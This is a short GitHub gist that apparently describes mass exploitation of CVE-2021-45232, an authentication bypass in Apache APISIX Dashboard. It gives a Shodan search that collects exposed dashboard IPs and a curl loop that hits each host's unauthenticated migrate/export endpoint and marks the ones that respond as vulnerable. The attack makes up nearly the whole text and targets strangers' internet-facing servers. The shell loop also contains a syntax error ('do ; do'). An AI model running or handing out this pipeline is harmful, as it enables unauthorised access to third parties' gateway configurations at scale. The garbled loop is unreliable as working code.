Created
January 6, 2022 14:27
-
-
Save simrotion13/8fd3b41d64b36f2f47f9876ab1a7b493 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Mass exploitation of Apache APISIX Dashboard Unauthorized Access Vulnerability (CVE-2021-45232) | |
| In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin`, all APIs and authentication middleware are developed based on framework `droplet`, but some API directly use the interface of framework `gin` thus bypassing the authentication. | |
| Shodan Dork : title="Apache APISIX Dashboard" | |
| run below command to get list of ip running apache apisix application | |
| shodan search 'title="Apache APISIX Dashboard"' --fields ip_str,port --separator " " | awk '{print $1":"$2}' | tee -a temp.txt | |
| cat temp.txt | httpx | tee -a url.txt | |
| We will using below process to automate the vulnerability scanning | |
| cat url.txt | while read host do ; do curl --silent --path-as-is --insecure "$host/apisix/admin/migrate/export" | grep -qs 'Counsumers' && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n"; done | |
| Check the Vulnerable URL on browser |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment